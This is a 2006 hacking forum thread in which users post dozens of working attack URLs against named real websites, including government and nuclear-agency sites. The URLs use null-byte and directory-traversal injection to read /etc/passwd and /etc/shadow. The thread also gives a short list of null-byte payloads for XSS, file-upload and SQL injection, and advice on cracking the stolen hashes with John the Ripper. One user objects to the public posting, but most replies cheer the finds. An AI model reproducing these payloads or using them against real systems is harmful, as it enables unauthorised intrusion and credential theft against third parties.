Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
So it begins - Null byte edition
Posted by: jungsonn
Date: November 17, 2006 11:39AM

Gha.

http://tactile.nrcan.gc.ca/page.cgi?url=page.cgi%00.html

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 18, 2006 09:40AM

http://www.richters.com/newdisplay.cgi?page=newdisplay.cgi%00.html

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 18, 2006 09:40AM

http://www.cppgameprogramming.com/cgi/nav.cgi?page=nav.cgi%00.html

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 18, 2006 09:41AM

../%00 works fine:

http://www.accessola.com/site/showPage.cgi?page=../%00

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: rsnake
Date: November 18, 2006 07:00PM

Nice! I haven't seen null byte injections for a while. I'm glad to see people are still using PERL, even if they are getting screwed by it. :) Those could easily lead to server compromise.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 19, 2006 01:46PM

yeah indeed. i though about something like this: redirect.cgi?page=/etc/passwd%00 or something.

Haven't found one by now, but that's a question of time.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: maluc
Date: November 19, 2006 02:10PM

someone care to explain null byte exploiting in more detail..? i.e. what you can do with it.

and does it only effect websites with a perl backend?

-maluc

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 20, 2006 01:32AM

A Null Byte affects most of program languages even PHP
(like regex functions who are not binary safe, e.g.
It skips everything after the Null Byte)

A few i know of:

Directory traversal (CGI):
like: ../et/passwd%00

XSS Null Byte:
search=<%00script>

File Uploads:
file.exe%00.jpg

SQL/PHP Injection:
id=1%00 INSERT INTO TABLE

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: maluc
Date: November 20, 2006 02:33AM

exactly what i was looking for, thanks

-maluc

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: rsnake
Date: November 20, 2006 10:37AM

The original null byte text was out of Phrack 55. Basically it's like this. If you have code that is looking for a string "root" and says, 'do x as long as user != "root"' and you inject root%00 you have circumvented the string. Then it will perform the function as root%00 and as the null is a string terminator it is silently dropped. It affects more than PERL as jungsonn explained.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:34PM

Yah, scary passwd file:
http://afi.yournetplus.com/showpage.cgi?p=../../../etc/passwd%00

Just messed up cgi:
http://afi.yournetplus.com/showpage.cgi?p=../showpage.cgi%00.html

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:34PM

Yet another scary passwd file up for the grabs:
http://www.inav.net/showpage.cgi?p=../../../etc/passwd%00

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:35PM

And another:
http://www.surfsation.com/showpage.cgi?p=../../../etc/passwd%00

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:44PM

Hm.. this gets boring.
http://www.mwci.net/showpage.cgi?p=../../../etc/passwd%00
http://www.veriqik.com/showpage.cgi?p=../../../etc/passwd%00
http://www.neonbob.com/showpage.cgi?p=../../../etc/passwd%00

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: maluc
Date: November 21, 2006 02:19PM

yay for google dorks ^^

-maluc

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 02:26PM

Ghe.. looks like 1 person builded those sites.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 27, 2006 11:02AM

I'm glad nuclear power security is in good hands, so we can sleep like a rose:
https://www.nemre.nnsa.doe.gov/cgi-bin/prod/shared/index.cgi?Page=../../../../../../etc/passwd%00&NavBar=off

Just messed up:
http://jp-bridge.com/page.cgi?url=page.cgi%00.html

Or just saves files to your desktop:
http://valet.webthing.com/link/link.cgi?url=link.cgi%00
http://www2.cybair.com:8080/exchange/link.cgi?url=link.cgi%00
http://chemstat.com.ru/cgi-bin/redir.cgi?url=redir.cgi%00.html

This one goes fast (redirect) but it shows the cgi file, so click stop.
http://www.investcom.com/cgi-bin/redir.cgi?url=/mutualf/calculator.htm&frame=redir.cgi%00.html



Edited 1 time(s). Last edit at 11/27/2006 11:15AM by jungsonn.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: digi7al64
Date: November 28, 2006 12:15AM

@jungson

ballsy effort on the nnsa.doe.gov site.

However i can't really say that i agree with you posting it. Whilst i have disclosed reflective xss holes on an number of sites i always try and be responsible with what and how i post... (for instance no sql injections, no gov site, no commercial grade applications that can effect lots of users etc) and in this case i think responsible FD to the administrator would have been the better option.

Its not to say i don't agree with what you have posted, any agency in charge of any nuclear data should be more accountable and secure then everyday sites.

The problem is the criminal element that lurk around these sites that now know about this hole... and i would suggest as we speak are already either trying to or rootkit/backdoor etc the site for information and/or the internal networks it could be connected to.


Either way for what it is worth i think you can now consider yourself being tracked and with you already having published you website url it will be fair to assume you shall be receiving a visit shortly.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 28, 2006 01:07AM

I understand and feel what you're saying, though maybe it's been already hacked for 3, or maybe 8 years. Who knows how long that hole exist. many things go unnoticed until someone who is passing by sees that someone's frontdoor is open and rings the bell by all the neighbours.

I've reasoned before, that i'm not going to make a difference in found sites, i either post them or not, without looking at the actual content on it.

Yeap, that means they have to re-install the whole damn server to be sure there are no backdoors installed by now.

Everybody is welcome in my home :)

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: maluc
Date: November 28, 2006 01:46AM

i agree that he more than likely got himself an FBI file now if he didn't already have one - but i'd be surprised if they paid a visit in person over it. (Unless of course you tested the 'validity' of those passwords) .. The action can definitely be construed as illegal - but luckily in America i think we have to prove intent (IANAL)

So i don't think he needs to go call up his lawyer right now.. if i find similar holes i'll probably do the same as fully disclose them. Hopefully they learn their lesson from it, and put more emphasis in securing their site - particularly being part of the National Nuclear Security Association.

i really don't think full disclosure should be illegal, when there is no malicious intent. but my guess is politicians will make it illegal, since they don't understand it.

a good find regardless.

-maluc

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 28, 2006 01:57AM

One thing i know 4 sure: i ain't going to eat sushi this week.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: rsnake
Date: November 28, 2006 10:54AM

Okay, cool... ALL SPIES, PLEASE NOTE, Jungsonn will not be eating sushi this week. Please poison him next week. Thank you. That is all.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 28, 2006 03:55PM

Yah, heck i never eat sushi :)

But according to Tias i could always start my own shop:
http://www.tias.com/makeashop/index.cgi?page=index.cgi%00.html

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: Ghozt
Date: November 30, 2006 11:15PM

I'm glad to see the NEMRE fixed theirs. I also noticed that most servers will feed you the passwd file without the null byte.

http://www.aboutit.co.nz/Iminit/servlet/Serve?file=../../../../../../../etc/passwd
http://afi.yournetplus.com/showpage.cgi?p=../../../etc/passwd
http://www.inav.net/showpage.cgi?p=../../../etc/passwd
http://www.surfsation.com/showpage.cgi?p=../../../etc/passwd
http://www.mwci.net/showpage.cgi?p=../../../etc/passwd
http://www.veriqik.com/showpage.cgi?p=../../../etc/passwd
http://www.neonbob.com/showpage.cgi?p=../../../etc/passwd

Huge: http://www.brustkrebs.de/scripts/print.php?file=../../../../../etc/passwd



Edited 1 time(s). Last edit at 11/30/2006 11:17PM by Ghozt.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: December 01, 2006 08:08AM

Yes indeed Ghozt, some do and some don't show with or without the nullbyte. Mostones i found only showed with the nullbyte. Granted that in this case it woudn't matter much.

nice finds BTW!

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: Ghozt
Date: December 01, 2006 04:05PM

jungsonn, those are all the ones that you found. I just took the null byte out and posted them again.

--Well, except for aboutit.co.nz and brustkrebs.de.
http://www.virtuallabs.de/vl.php?file=../../../etc/passwd

Shadow files:
http://www.aboutit.co.nz/Iminit/servlet/Serve?file=../../../../../../../etc/shadow
http://www.virtuallabs.de/vl.php?file=../../../etc/shadow



Edited 1 time(s). Last edit at 12/01/2006 04:32PM by Ghozt.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: Ghozt
Date: December 01, 2006 05:23PM

http://www.aquariusaroma-soap.com/cgi-bin/s_321_ch.cgi?user_id=id&database=catalogue.exm&template=../../../etc/passwd&1_option=3&1=Lamps
http://www.aquariusaroma-soap.com/cgi-bin/s_321_ch.cgi?user_id=id&database=../../../etc/passwd&template=products/cosmetic.html&1_option=3&1=Cosmetic-Base (Gives error instead of showing file)
http://www.adlinktech.com/big5/investor/home.php?file=../../../../etc/passwd
http://www.sandeepnet.com/index.php?file=../../../../etc/passwd
http://www.assured.com/cgi-bin/as_site_manager.pl?file=../../../etc/passwd
http://highmanagement.net/Soluciones/RecursosHumanos.phtml?file=../../../../../../etc/passwd

There are a lot more I'm sure, but I haven't seen any that need the null byte, so this is just file disclosure.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: adam
Date: December 01, 2006 06:14PM

I thought the shadow file had the actual passwords in?

Adam

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: maluc
Date: December 01, 2006 07:00PM

sometimes it's in etc/passwd .. sometimes in etc/shadow. this should answer most your questions http://en.wikipedia.org/wiki/Shadow_password so i won't repeat it

but they only have the encrypted hashes.. (usually DES) which can be cracked with John the Ripper afterwards. DES cracking is slow so i really recommend you find yourself a large dictionary file first to test against.

-maluc

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: December 01, 2006 07:54PM

In the passwd file if you'll see: X or * it is shadowed, and then there's nothing you can do about.

But with directory traversal, it's common to filter against that. With a nullbyte at the end, the chances are higher for disclosure. so /etc/passwd%00 would prove to be more succesfull in many cases than: /etc/passwd when ordinary traversal doens't work.

the passwd traversal was a mere option to explore the ways of nullbytes.
having said this it wasn't my initial idea, case if you could traverse a directory, then there is something very wrong in the first place.

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.